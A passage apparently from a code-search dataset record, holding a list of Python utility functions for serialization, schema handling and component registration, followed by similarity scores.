isinstance(obj, list) or isinstance(obj, tuple) or isinstance(obj, set):\n new_list = type(obj)()\n for item in obj:\n if isinstance(obj, set):\n new_list.add(convert_to_references(item))\n else:\n new_list.append(convert_to_references(item))\n converted_obj = new_list\n elif isinstance(obj, dict):\n new_dict = {}\n for key, converted_obj in obj.items():\n new_dict[key] = convert_to_references(converted_obj)\n converted_obj = new_dict\n elif obj and isinstance(obj, object) and hasattr(obj, '__dict__'):\n converted_obj = convert_to_references(obj.__dict__)\n else:\n converted_obj = obj\n return converted_obj", "def register(self, obj):\r\n name = obj._component_name\r\n if name in self.components:\r\n raise ComponentAlreadyRegistered(\"Component already registered with name %s\" % name)\r\n\r\n self.components[obj._component_name] = obj", "def dump(self, obj, context=None):\n return self.schema_class(context=context).dump(obj).data", "def get_object_type(schema_obj):\n\n if isinstance(schema_obj, schema.Field):\n raise exception.InvalidArgument(schema_obj)\n return schema_obj.full_name", "def _get_schema_from_object(self, data):\n if \"items\" in data:\n return self._get_schema_from_object(data[\"items\"])\n\n url_key = None\n\n if '$id' in data:\n url_key = '$id'\n\n if 'id' in data:\n url_key = 'id'\n\n if url_key:\n url = data[url_key]\n schema = Schema().build()\n schema.domain_entity = self.get_domain_entity_from_url(url)\n schema.high_level_entity = self.get_high_level_entity_from_url(url)\n schema.module = self.get_module_from_url(url)\n schema.url = url\n return schema\n\n return None", "def deserialize(self, obj):\n raise NotImplementedError", "def to_field(obj):\r\n\r\n\r\n if isinstance(obj, Field):\r\n field = obj\r\n else:\r\n d = { \"storage_type\": \"unknown\" 
}\r\n\r\n if isinstance(obj, basestring):\r\n d[\"name\"] = obj\r\n elif type(obj) == tuple or type(obj) == list:\r\n d[\"name\"] = obj[0]\r\n try:\r\n d[\"storage_type\"] = obj[1]\r\n try:\r\n d[\"analytical_type\"] = obj[2]\r\n except:\r\n pass\r\n except:\r\n pass\r\n else: # assume dictionary\r\n d[\"name\"] = obj[\"name\"]\r\n d[\"label\"] = obj.get(\"label\")\r\n d[\"storage_type\"] = obj.get(\"storage_type\")\r\n d[\"analytical_type\"] = obj.get(\"analytical_type\")\r\n d[\"adapter_storage_type\"] = obj.get(\"adapter_storage_type\")\r\n\r\n if \"analytical_type\" not in d:\r\n storage_type = d.get(\"storage_type\")\r\n if storage_type:\r\n deftype = default_analytical_types.get(storage_type)\r\n d[\"analytical_type\"] = deftype or \"typeless\"\r\n else:\r\n d[\"analytical_type\"] = \"typeless\"\r\n\r\n field = Field(**d)\r\n return field", "def init_obj(obj_name):\n ret = type(obj_name, (object,), {})\n return ret", "def from_object(cls, obj):\n if any(p is obj for p in obj.params):\n raise ValueError(\n f\"Cannot create a Function from a parameter object. This parameter {obj._name!r} \"\n \"is like an argument to a function---not the body of the function itself.\"\n )\n\n named_args = {p._name: getattr(p, \"_proxytype\", type(p)) for p in obj.params}\n # ^ if any of the params are widgets (likely), use their base Proxytype in the Function type signature:\n # a Function[Checkbox, Slider, ...] would be 1) weird and 2) not serializeable.\n concrete_function_type = cls[named_args, type(obj)]\n\n graft = client.function_graft(obj, *(p.graft for p in obj.params))\n # TODO we should probably store `obj.params` somewhere---that's valuable metadata maybe\n # to show the function as widgets, etc?\n return concrete_function_type._from_graft(graft)", "def normalize_to_ref(tobject, tobject_ref):\n\n _new_tobject = asrootpy(tobject.Clone())\n if tobject.integral():\n _factor = float(tobject_ref.integral()) / float(tobject.integral())\n\n return _new_tobject * _factor\n else:\n return _new_tobject", "def generate_parser_obj(obj, *, default_type=None):\n parser = argparse.ArgumentParser(\n prog=obj.__name__,\n # Modules tend to have very long docstrings...\n description=inspect.cleandoc(obj.__doc__).splitlines()[0] if obj.__doc__ else None\n )\n # Dest is suppressed by default. 
Set it to a value that no parameter name can take.\n subparsers = parser.add_subparsers(dest='{command}')\n # Due to a stupid bug, subparsers are optional by default.\n subparsers.required = True\n\n def functions(obj):\n return tuple([o[1] for o in inspect.getmembers(obj) if inspect.isfunction(o[1])])\n\n for func in functions(obj):\n thisparser = subparsers.add_parser(\n func.__name__,\n description=inspect.cleandoc(func.__doc__) if func.__doc__ else None\n )\n generate_parser(func, thisparser, default_type=default_type)\n # Save a reference for obj2cli to call if this subparser is used.\n thisparser.set_defaults(**{'{func}':func})\n\n return parser", "def bundle_instance(obj):\n\n content, contents = osl_encode(obj, True)\n # should be a bunch of documents, not just one.\n bundle = [json.dumps(c) for c in contents]\n return bundle", "def from_dto(cls, obj):\n if obj is None:\n return None\n\n if not hasattr(obj, '_data'):\n return None\n\n new_model = cls()\n\n for key in obj._data:\n if key == 'transcripts':\n setattr(new_model, key, [DTOConverter.from_dto(Transcript, t) for t in obj._data[key]])\n elif key == 'acts' and cls == Transcript:\n setattr(new_model, key, [DTOConverter.from_dto(Act, a) for a in obj._data[key]])\n elif key == 'subtitles':\n setattr(new_model, key, [DTOConverter.from_dto(Subtitle, s) for s in obj._data[key]])\n else:\n if key != 'id':\n setattr(new_model, key, obj._data[key])\n\n return new_model", "def to_base(self, obj):\n if hasattr(obj, \"to_base\"):\n return obj.to_base()\n return obj" ]
[ "0.6243453", "0.5825912", "0.57944256", "0.57603896", "0.56610686", "0.5654507", "0.5639352", "0.5597519", "0.5585299", "0.5489156", "0.5368194", "0.53657424", "0.5364657", "0.5353328", "0.5295786", "0.5216217", "0.5193709", "0.516745", "0.51386046", "0.5135405", "0.5110169", "0.50898105", "0.5063764", "0.50441045", "0.50145745", "0.50011015", "0.49532762", "0.49450698", "0.49389306", "0.493456" ]
0.81769264
0
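The `create_reference` call resolves to the usual OpenAPI `$ref` shape; the sketch below models pyopenapi3's `ReferenceObject` as a plain dict, which is an assumption for illustration:

```python
def create_reference(name, cmp_type):
    return {"$ref": f"#/components/{cmp_type}/{name}"}

def convert_objects_to_schema(obj):
    cmp_type = "schemas"  # default component type
    if hasattr(obj, "__cmp_type__"):
        cmp_type = obj.__cmp_type__.lower()
    return create_reference(obj.__name__, cmp_type)

class Pet:  # stands in for a user-defined Component subclass
    __cmp_type__ = "Parameters"

print(convert_objects_to_schema(Pet))  # {'$ref': '#/components/parameters/Pet'}

class Toy:  # no __cmp_type__ -> falls back to the schemas section
    pass

print(convert_objects_to_schema(Toy))  # {'$ref': '#/components/schemas/Toy'}
```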
'Inject' the `Component` class into the custom, user-defined, soon-to-be Component class. This helps when building a property that involves a user-defined custom Component. The param `cmp_type` is some subtype of `data_types.Component`, e.g. a Schema component or a Parameter component.
def inject_component(cls, cmp_type: Type[ComponentType]):\n    if issubclass(cls, Component):\n        return cls\n    else:\n        injected = type(\n            "Injected",\n            (cls, cmp_type),\n            {attr_name: attr for attr_name, attr in cls.__dict__.items()}\n        )\n        injected.__qualname__ = f'Component[{cls.__name__}]'\n        # Make sure not to override name, because it will be\n        # used in the conversion to an Open API object, e.g.\n        # {__name__: <rest of properties>}.\n        injected.__name__ = cls.__name__\n        injected.__cmp_type__ = cmp_type.__name__  # type: ignore\n        return injected
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_comp(self, name, ctype):\n\n name = self.name + '.' + name\n\n assert name not in self.components, 'A component named \\'{}\\' already exists for node \\'{}\\''.format(\n name, self.name)\n\n try:\n cls = co.str_to_comp(ctype)\n except AttributeError:\n try:\n cls = rc.str_to_comp(ctype)\n except AttributeError:\n cls = None\n\n if cls:\n obj = cls(name=name,\n temperature_driven=self.temperature_driven,\n repr_days=self.repr_days)\n else:\n raise ValueError(\n \"%s is not a valid class name! (component is %s, in node %s)\" % (\n ctype, name, self.name))\n\n self.logger.info('Component {} added to {}'.format(name, self.name))\n\n self.components[name] = obj", "def __init__(self, component):\r\n self.component = component", "def __init__(self, component):\r\n self.component = component", "def registerType(cls, type):\n # NOTE Subclasses must be registered via this method in order to be initialized from XML, etc.\n cls.componentTypes[type.__name__] = type\n #print \"Component.registerType(): Component type \\'\" + type.__name__ + \"\\' registered.\" # [debug]", "def createappendcomp(self, componentname, componentclass, *args, **kwargs):\n component = componentclass(self, self.debugmode, *args, **kwargs)\n self.components.append(componentname, component)\n return component", "def TypedComponentLoader(ComponentLoader):\n def __init__(self, portal_type):\n self._portal_type = portal_type\n \n def __call__(self, reference, version=None):\n return ComponentLoader.__call__(self._portal_type, reference, version=version)\n\n def __getattr__(self, key):\n if key.startswith('_'):\n return self.__dict__[key]\n return self(key)", "def test_component_arg(thing):\n\n class HelloThing(Component):\n def __init__(self, thing: str):\n self.thing = thing\n\n template = \"\"\"\n hello, <<self.thing>>!\"\"\"\n\n assert snippet_eval(ComponentSnippet(HelloThing(thing))) == f\"hello, {thing}!\\n\"", "def add_component(self, lib_component):\n comp_name = lib_component.name\n try:\n comp = self.__component_list[comp_name]\n except KeyError:\n self.__component_list[comp_name] = lib_component", "def load(\n cls,\n component_config: Dict[Text, Any],\n model_dir: Optional[Text] = None,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n if cached_component:\n return cached_component\n else:\n return cls(component_config)", "def register_component(var, config):\n id_ = text_type(var.base)\n if id_ not in CORE.component_ids:\n raise ValueError(u\"Component ID {} was not declared to inherit from Component, \"\n u\"or was registered twice. Please create a bug report with your \"\n u\"configuration.\".format(id_))\n CORE.component_ids.remove(id_)\n if CONF_SETUP_PRIORITY in config:\n add(var.set_setup_priority(config[CONF_SETUP_PRIORITY]))\n if CONF_UPDATE_INTERVAL in config:\n add(var.set_update_interval(config[CONF_UPDATE_INTERVAL]))\n add(App.register_component(var))\n yield var", "def create_component_instance(step, category, component_type=None, is_advanced=False):\r\n assert_in(category, ['problem', 'html', 'video', 'discussion'])\r\n\r\n component_button_css = 'span.large-{}-icon'.format(category.lower())\r\n if category == 'problem':\r\n module_css = 'div.xmodule_CapaModule'\r\n else:\r\n module_css = 'div.xmodule_{}Module'.format(category.title())\r\n\r\n # Count how many of that module is on the page. 
Later we will\r\n # assert that one more was added.\r\n # We need to use world.browser.find_by_css instead of world.css_find\r\n # because it's ok if there are currently zero of them.\r\n module_count_before = len(world.browser.find_by_css(module_css))\r\n\r\n # Disable the jquery animation for the transition to the menus.\r\n world.disable_jquery_animations()\r\n world.css_click(component_button_css)\r\n\r\n if category in ('problem', 'html'):\r\n world.wait_for_invisible(component_button_css)\r\n click_component_from_menu(category, component_type, is_advanced)\r\n\r\n expected_count = module_count_before + 1\r\n world.wait_for(\r\n lambda _: len(world.css_find(module_css)) == expected_count,\r\n timeout=20\r\n )", "def component_type(self, component_type):\n allowed_values = [\"CONNECTION\", \"PROCESSOR\", \"PROCESS_GROUP\", \"REMOTE_PROCESS_GROUP\", \"INPUT_PORT\", \"OUTPUT_PORT\", \"REMOTE_INPUT_PORT\", \"REMOTE_OUTPUT_PORT\", \"FUNNEL\", \"LABEL\", \"CONTROLLER_SERVICE\", \"REPORTING_TASK\", \"PARAMETER_CONTEXT\", \"PARAMETER_PROVIDER\", \"TEMPLATE\", \"FLOW_REGISTRY_CLIENT\"]\n if component_type not in allowed_values:\n raise ValueError(\n \"Invalid value for `component_type` ({0}), must be one of {1}\"\n .format(component_type, allowed_values)\n )\n\n self._component_type = component_type", "def cog_component(\n *,\n messages: typing.Union[int, discord.Message, list] = None,\n components: typing.Union[str, dict, list] = None,\n use_callback_name=True,\n component_type: int = None,\n):\n message_ids = list(get_messages_ids(messages)) if messages is not None else [None]\n custom_ids = list(get_components_ids(components)) if components is not None else [None]\n\n def wrapper(callback):\n nonlocal custom_ids\n\n if use_callback_name and custom_ids == [None]:\n custom_ids = [callback.__name__]\n\n if message_ids == [None] and custom_ids == [None]:\n raise IncorrectFormat(\"You must specify messages or components (or both)\")\n\n return CogComponentCallbackObject(\n callback,\n message_ids=message_ids,\n custom_ids=custom_ids,\n component_type=component_type,\n )\n\n return wrapper", "def make_component(self, name=\"Face\") -> 'Component':\n return BRepComponent(self.brep, component=self.component, name=name)", "def load(\n cls,\n meta: Dict[Text, Any],\n model_dir: Optional[Text] = None,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n\n if cached_component:\n return cached_component\n else:\n return cls(meta)", "def load(\n cls,\n meta: Dict[Text, Any],\n model_dir: Optional[Text] = None,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n\n if cached_component:\n return cached_component\n else:\n return cls(meta)", "def use(self, compo_type):\n self.compo_type = compo_type", "def load(\n cls,\n meta: Dict[Text, Any],\n model_dir: Optional[Text] = None,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n\n if cached_component:\n return cached_component\n\n return cls(meta)", "def create_component_instantiation(custom_components, template):\n built_string = \"\"\n for custom_component in custom_components:\n built_string += template.add_custom_component_instantiaion(\n custom_component)\n return built_string", "def of_json(json: JSON) -> 'ComponentView':\n\n cls = Class.of_json(json)\n\n if 
LangChainComponent.class_is(cls):\n return LangChainComponent.of_json(json)\n elif LlamaIndexComponent.class_is(cls):\n return LlamaIndexComponent.of_json(json)\n elif TrulensComponent.class_is(cls):\n return TrulensComponent.of_json(json)\n else:\n raise TypeError(f\"Unhandled component type with class {cls}\")", "def add_component(self, new: components.Component) -> None:\n for existing in self.components:\n if isinstance(existing, type(new)):\n raise Exception(type(new))\n self.components.append(new)", "def create_new_component(self, cname):\n while True:\n try:\n self.model.get_component_by_name(cname)\n cname += u'_'\n except KeyError:\n # Component with this name doesn't exist\n break\n # Create the component\n comp = cellml_component.create_new(self.model, cname)\n self.model._add_component(comp)\n return comp", "def component(self, component):\n\n self._component = component", "def component(self, component):\n\n self._component = component", "def add_component(self, param):\n if param.name in self.components:\n raise Exception('The network already has a parameter \"%s\"!'\n % param.name)\n self.components[param.name] = param", "def add_component(self, componentInstance):\n\n #print \"Componet being added to %s entity.\"%(self._sName)\n #print componentInstance\n \n self._dComponents[componentInstance.get_name()] = componentInstance\n\n #These if statements will save a pointer of the same variable as in dComponents if True.\n\n if componentInstance.get_updateable():\n self._lUpdatables.append(componentInstance)\n\n if componentInstance.is_view_drawable():\n self._lViewDrawables.append(componentInstance)\n\n elif componentInstance.is_screen_drawable():\n self._lScreenDrawables.append(componentInstance)", "def _load_component(self, name):\n cls = None\n if self.mapping and name in self.mapping:\n cls = self.mapping[name]\n elif \".\" in name:\n cls = self._import(*name.rsplit(\".\", 1))\n else:\n for base in self.bases:\n if self.module:\n mod = base\n else:\n mod = \"%s.%s\" % (base, name)\n cls = self._import(mod, name)\n if cls is not None:\n break\n if cls:\n get_parser().add_component(cls)\n elif not self.fail_silently:\n raise OptionParserException(\"Could not load component %s\" % name)\n return cls", "def _set_component_type_params(self, component_type):\n self.component_type = component_type\n\n if component_type == \"healpix\":\n self._name.required = False\n self._skycoord.required = False\n self._hpx_inds.required = True\n self._nside.required = True\n self._hpx_order.required = True\n self._hpx_frame.required = True\n else:\n self._name.required = True\n self._skycoord.required = True\n self._hpx_inds.required = False\n self._nside.required = False\n self._hpx_order.required = False\n self._hpx_frame.required = False", "def setComponent(self, *args):\n return _libsbml.SpeciesTypeComponentIndex_setComponent(self, *args)", "def create(\n cls, component_config: Dict[Text, Any], config: DazuConfig\n ) -> \"Component\":\n\n # Check language supporting\n language = config.language\n if not cls.can_handle_language(language):\n # check failed\n raise UnsupportedLanguageError(cls.name, language)\n\n return cls(component_config)" ]
[ "0.6341976", "0.60763973", "0.60763973", "0.5894654", "0.5816849", "0.5718252", "0.56145835", "0.56028533", "0.5554072", "0.55418164", "0.5510925", "0.54735297", "0.54278535", "0.5406879", "0.5326886", "0.5326886", "0.5322498", "0.52880853", "0.518145", "0.51773274", "0.51618105", "0.515665", "0.5146011", "0.5146011", "0.5142499", "0.51353246", "0.5109745", "0.50896114", "0.5074385", "0.5055582" ]
0.7875679
0
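The `type(...)` call above is the standard dynamic-subclass idiom. A runnable sketch with minimal stand-ins for pyopenapi3's `Component`/`Schema` classes; the stand-ins and the slot-descriptor filter are sketch assumptions:

```python
class Component: ...
class Schema(Component): ...

def inject_component(cls, cmp_type):
    if issubclass(cls, Component):
        return cls
    # Copy the class body onto a new subclass of both cls and cmp_type;
    # slot descriptors are dropped since the new class inherits its own.
    body = {k: v for k, v in cls.__dict__.items()
            if k not in ("__dict__", "__weakref__")}
    injected = type("Injected", (cls, cmp_type), body)
    injected.__qualname__ = f"Component[{cls.__name__}]"
    injected.__name__ = cls.__name__  # keep the name for the OpenAPI object
    injected.__cmp_type__ = cmp_type.__name__
    return injected

class Pet:
    kind = "dog"

Injected = inject_component(Pet, Schema)
print(Injected.__name__, Injected.__cmp_type__)        # Pet Schema
print(issubclass(Injected, Component), Injected.kind)  # True dog
```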
Determine all of the local IP addresses for this machine. This allows us to flag traffic as inbound or outbound.
def detect_local_ips(self):\n    result = set()\n    for ifaceName in interfaces():\n        try:\n            address = [i['addr'] for i in ifaddresses(ifaceName)[AF_INET]]\n        except:\n            pass\n        result.add(address[0])\n    return tuple(result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_ips():\r\n local_ips = []\r\n public_ips = []\r\n \r\n # list of iface names, 'lo0', 'eth0', etc.\r\n for iface in netifaces.interfaces():\r\n # list of ipv4 addrinfo dicts\r\n ipv4s = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])\r\n for entry in ipv4s:\r\n addr = entry.get('addr')\r\n #print(\"addr: \" + addr)\r\n if not addr:\r\n continue\r\n if not (iface.startswith('lo') or addr.startswith('127.')):\r\n public_ips.append(addr)\r\n else:\r\n local_ips.append(addr) \r\n return public_ips", "def local_bind_addresses(self):\n self._check_is_started()\n return [_server.local_address for _server in self._server_list]", "def get_local_address_range(self):\n return str(self.min_local_ip), str(self.max_local_ip)", "def local_ip():\n sys_name = system()\n if sys_name == 'Darwin':\n # OSX\n route = Command('route')\n ifconfig = Command('ifconfig')\n\n iface = [\n line.strip()\n for line in route('-n', 'get', 'default')\n if line.strip().startswith('interface')\n ][0].split(':')[1].strip()\n return [\n line.strip()\n for line in ifconfig(iface)\n if line.strip().startswith('inet ')\n ][0].split(' ')[1]\n elif sys_name == 'Linux':\n try:\n ip = Command('ip')\n iface = [\n line.strip()\n for line in ip('route')\n if line.strip().startswith('default ')\n ][0].split(' ')[4]\n except CommandNotFound:\n route = Command('route')\n iface = [\n line.strip()\n for line in route('-n')\n if line.startswith('0.0.0.0')\n ][0].split(' ').pop()\n\n try:\n # try with IP\n ip = Command('ip')\n return [\n line.strip()\n for line in ip('addr', 'show', iface)\n if line.strip().startswith('inet ')\n ][0].split(' ')[1].split('/')[0]\n except CommandNotFound:\n pass\n\n # fallback to ifconfig\n ifconfig = Command('ifconfig')\n return [\n line.strip()\n for line in ifconfig(iface)\n if line.strip().startswith('inet ')\n ][0].split(' ')[1]\n\n return None", "def ip_addresses(self):\n try:\n return socket.gethostbyaddr(self.fqdn)[-1]\n except socket.error as _:\n return ['127.0.0.1']", "def localip(self) :\n\t\ttry :\n\t\t\treturn self._localip\n\t\texcept Exception as e:\n\t\t\traise e", "def neighbors_ip(self):\n neighbors = self.neighbors()\n nei_list = []\n net_ip = self._rloc_ip_net_addr()\n if neighbors is not None:\n for nei_rec in neighbors:\n nei_ip = net_ip + hex(nei_rec.rloc16)[2:]\n nei_list.append(nei_ip)\n return nei_list", "def inetVisibleIP(self):\n def handle(results):\n ips = [ result[1][0] for result in results if result[0] ]\n self.log.debug(\"other nodes think our ip is %s\" % str(ips))\n return ips\n\n ds = []\n for neighbor in self.bootstrappableNeighbors():\n ds.append(self.protocol.stun(neighbor))\n d = defer.gatherResults(ds)\n d.addCallback(handle)\n d.addErrback(self.onError)\n return d", "def _update_ips(self):\n self.ip_others = []\n ips = self.mesh.ipaddr()\n self.rloc16 = self.mesh.rloc()\n for line in ips:\n if line.startswith('fd'):\n # Mesh-Local unicast IPv6\n try:\n addr = int(line.split(':')[-1], 16)\n except Exception:\n continue\n if addr == self.rloc16:\n # found RLOC\n # RLOC IPv6 has x:x:x:x:0:ff:fe00:RLOC16\n self.rloc = line\n elif ':0:ff:fe00:' not in line:\n # found Mesh-Local EID\n self.ip_eid = line\n elif line.startswith('fe80'):\n # Link-Local\n self.ip_link = line\n else:\n self.ip_others.append(line)", "def public_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"public_ip_addresses\")", "def ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IpMappingArgs']]]]:\n return 
pulumi.get(self, \"ip_addresses\")", "def public_ip_addresses(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"public_ip_addresses\")", "def network_interfaces():\n try:\n command = which('ipadm')\n args = ('show-addr', '-p', '-o', 'STATE,ADDR')\n pattern = r'ok:(\\d+\\.\\d+\\.\\d+\\.\\d+)'\n except CommandMissing:\n # Fall back to old command on old solaris releases.\n command = which('/usr/sbin/ifconfig')\n args = ('-a')\n pattern = r'inet (\\d+\\.\\d+\\.\\d+\\.\\d+)'\n addrs = []\n output = sh(command, *args)\n for line in output:\n match = re.match(pattern, line)\n if match:\n addr = match.group(1)\n if not addr.startswith(\"127.\"):\n addrs.append(addr)\n return addrs", "def get_all_ips_connection(self):\n return self.m_connection.all_ips", "def remote_route(self):\r\n proxy = self.environ.get('HTTP_X_FORWARDED_FOR')\r\n if proxy: return [ip.strip() for ip in proxy.split(',')]\r\n remote = self.environ.get('REMOTE_ADDR')\r\n return [remote] if remote else []", "def get_floating_ips(self):\n return self.router.get(l3_constants.FLOATINGIP_KEY, [])", "def local_bind_ports(self):\n self._check_is_started()\n return [_server.local_port for _server in self._server_list if\n _server.local_port is not None]", "def get_ip_address_filter(self):\n return self.mycam.devicemgmt.GetIPAddressFilter()", "def _init_ipaddress_ops(self):\n\n # retrieve local and external IPs\n all_ips_str = set(self.statistics.process_db_query(\"all(ipAddress)\", print_results=False))\n # external_ips_str = set(self.statistics.process_db_query(\"ipAddress(macAddress=%s)\" % self.get_probable_router_mac(), print_results=False)) # including router\n # local_ips_str = all_ips_str - external_ips_str\n external_ips = set()\n local_ips = set()\n all_ips = set()\n\n self.contains_priv_ips = False\n self.priv_ip_segment = None\n\n # convert IP strings to IPv4.IPAddress representation\n for ip in all_ips_str:\n if is_ipv4(ip):\n ip = IPAddress.parse(ip)\n # exclude local broadcast address and other special addresses\n if (not str(ip) == \"255.255.255.255\") and (not ip.is_localhost()) and (not ip.is_multicast()) and (\n not ip.is_reserved()) and (not ip.is_zero_conf()):\n all_ips.add(ip)\n\n for ip in all_ips:\n if ip.is_private():\n local_ips.add(ip)\n\n external_ips = all_ips - local_ips\n\n # save the certain unused local IPs of the network\n # to do that, divide the unused local Addressspace into chunks of (chunks_size) Addresses\n # initally only the first chunk will be used, but more chunks can be added to the pool of unused_local_ips if needed\n self.min_local_ip, self.max_local_ip = min(local_ips), max(local_ips)\n local_ip_range = (self.max_local_ip.to_int()) - (self.min_local_ip.to_int() + 1)\n if local_ip_range < 0:\n # for min,max pairs like (1,1), (1,2) there is no free address in between, but for (1,1) local_ip_range may be -1, because 1-(1+1)=-1\n local_ip_range = 0\n\n # chunk size can be adjusted if needed\n self.chunk_size = 200\n\n self.current_chunk = 1\n if local_ip_range < self.chunk_size:\n # there are not more than chunk_size unused IP Addresses to begin with\n self.chunks = 0\n self.chunk_remainder = local_ip_range\n else:\n # determine how many chunks of (chunk_size) Addresses there are and the save the remainder\n self.chunks = local_ip_range // self.chunk_size\n self.chunk_remainder = local_ip_range % self.chunk_size\n\n # add the first chunk of IP Addresses\n self.unused_local_ips = set()\n self.expand_unused_local_ips()\n\n # save the gathered information for efficient later use\n 
self.external_ips = frozenset(external_ips)\n self.remaining_external_ips = external_ips\n self.max_uncertain_local_ip = self.max_local_ip\n self.local_ips = frozenset(local_ips)\n # print(\"External IPS: \" + str(external_ips))\n # print(\"LOCAL IPS: \" + str(local_ips))\n self.remaining_local_ips = local_ips\n self.uncertain_local_ips = set()", "def get_localhost_ip():\n ifs = netifaces.interfaces()\n for i in ifs:\n try:\n addr = netifaces.ifaddresses(i)[netifaces.AF_INET][0]['addr']\n except KeyError:\n pass\n\n if addr == '127.0.0.1':\n continue\n\n yield addr", "def local_bind_hosts(self):\n self._check_is_started()\n return [_server.local_host for _server in self._server_list if\n _server.local_host is not None]", "async def bindip_choices(self):\n return {\n d['address']: d['address'] for d in await self.middleware.call(\n 'interface.ip_in_use', {'static': True, 'any': True}\n )\n }", "def discovered_ips(self) -> Sequence[str]:\n return pulumi.get(self, \"discovered_ips\")", "def get_addrs(self):\n # TODO check if server is listening\n return self.multiaddrs", "def ip_addresses(self) -> pulumi.Output[Sequence['outputs.IpMappingResponse']]:\n return pulumi.get(self, \"ip_addresses\")", "def get_local_host_ip(self) -> str:", "def get_local_ip(self, system):\n if system == \"Linux\":\n # This is a bit ugly but it works\n ips = check_output(['hostname', '--all-ip-addresses']).decode(\"utf-8\")\n return ips.split(\" \")[0]\n else:\n return socket.gethostbyname(socket.gethostname())", "def set_ip_adresses(self):\n # unfold a config tree for the current suffix, if any\n for interface, details in self.interfaces.items():\n for k, v in details.items():\n if k == 'address':\n ip, prefix = address_to_ip_prefix(v)\n self.interfaces[interface]['ip_address'] = ip\n self.interfaces[interface]['ip_prefix'] = prefix\n break\n if interface == 'wan':\n self.ip_address = ip\n if interface == 'ha_sync':\n self.ha_sync_ip_address = ip", "def private_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"private_ip_addresses\")", "def grab_ips(self):\n parse_log = open(self.xmlrpc_log, 'r')\n for entry in parse_log:\n just_ip = entry.split()\n ip = just_ip[0]\n self.ip_list.append(ip)\n ip_set = set(self.ip_list)\n ips = list(ip_set)\n return ips" ]
[ "0.73083735", "0.72061265", "0.704093", "0.6923851", "0.6890017", "0.6762811", "0.6715329", "0.67115986", "0.66833586", "0.6657584", "0.66189605", "0.66133195", "0.66041005", "0.6584781", "0.6563698", "0.6518723", "0.64804894", "0.647476", "0.645703", "0.63811326", "0.6353452", "0.63502944", "0.6347195", "0.63224024", "0.6263298", "0.6226356", "0.62138575", "0.6151456", "0.61133534", "0.61025894" ]
0.74796903
0
Sorts an iterable of packets and removes the duplicates
def iter_packets(iterable):
    prev = None

    for i in sorted(iterable, key=attrgetter('seq')):
        if prev is None or prev.seq != i.seq:
            prev = i
            yield i
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sort_grouped_packets(self, grouped_packets):\n for group in grouped_packets:\n group.sort(key=lambda x: x.time, reverse=False)\n return grouped_packets", "def insertOrderedPacket(self, packet:Rudp.Packet, packets:list) -> list:\n i = 0\n for i in range(len(packets)):\n if packets[i].seq == packet.seq:\n print(\"Received Duplicated Packet, dropped: \", packet.seq)\n return packets\n if packets[i].seq > packet.seq:\n break\n\n if packet.seq <= self.ack:\n print(\"Packet Seq: \", packet.seq, \" Dropped\")\n return packets\n else:\n result = packets[:i] + [packet] + packets[i:]\n return result", "def sort_4(l):\n l = list(set(l))\n l.sort()", "def de_dup_and_sort(input):\r\n if input== None:\r\n return None\r\n input = list(input)\r\n input = remove_duplicates(input)\r\n input.sort()\r\n return input", "def cleanse(packets):\n pkts = []\n retran = False\n lost = False\n for pkt in packets:\n if len(pkt['data']) > 0:\n # If first packet just add and move on\n if len(pkts) == 0:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is = to this one add this pkt\n elif pkt['tcp']['seq_num'] == next_seq:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is > than this one there is a \n # Retransmission\n elif pkt['tcp']['seq_num'] < next_seq:\n retran = True\n elif pkt['tcp']['seq_num'] > next_seq:\n lost = True\n else:\n pass\n\n return pkts, retran, lost", "def group_packets(self, packets):\n sessions = packets.sessions() # groups connections from X to Y as a Scapy PacketList in a dict\n # example: dict['TCP 172.217.17.102:443 > 10.7.2.60:38386'] = PacketList\n\n session_keys = list(sessions.keys()) # force copy so we can alter the dictionary at runtime\n for key in session_keys:\n reversed_key = self.reverse_dict_key(key)\n if(reversed_key != key and sessions.__contains__(reversed_key)):\n sessions[key] += sessions.pop(reversed_key)\n session_keys.remove(reversed_key)\n\n return self.sort_grouped_packets(list(sessions.values()))", "def test_input_order_irrelevant(self):\n sorted_strings = ['1532-44349', '1534-44658', '1536-44582', '1536-44935', '1538-44874', '1538-44920']\n mutable_copy = list(sorted_strings)\n for i in range(10000):\n random.shuffle(mutable_copy)\n assert natsort(mutable_copy) == sorted_strings", "def natsort(lst):\n lst.sort(key=natsort_key)", "def remove_sorted_duplicates(self):\n cur = self.head\n while cur is not None and cur.next is not None:\n if cur.next.data == cur.data:\n cur.next = cur.next.next\n else:\n cur = cur.next\n return self.head", "def natsorted(lst):\n return sorted(lst, key=natsort_key)", "def sort_by_ip(unsorted):\n by_ip = {}\n\n for k, v in unsorted.items():\n for ip in v:\n if ip in by_ip and k not in by_ip[ip]:\n by_ip[ip].append(k)\n else:\n by_ip[ip] = [k]\n\n return OrderedDict(sorted(by_ip.items()))", "def sort(self):\n\t\tself.servers = sorted(self.servers, key=lambda s: s.load)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.distance_class)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.country == self.locale_info.country, reverse=True)", "def sort(self):\n # Sort here actually uses the tuple comparison we defined in the Card class\n self.cards.sort()", "def bogosort(to_sort):\n # Be sure to sort the list at each pass in the while loop to make it extra\n # inefficient!\n while sorted(to_sort) != 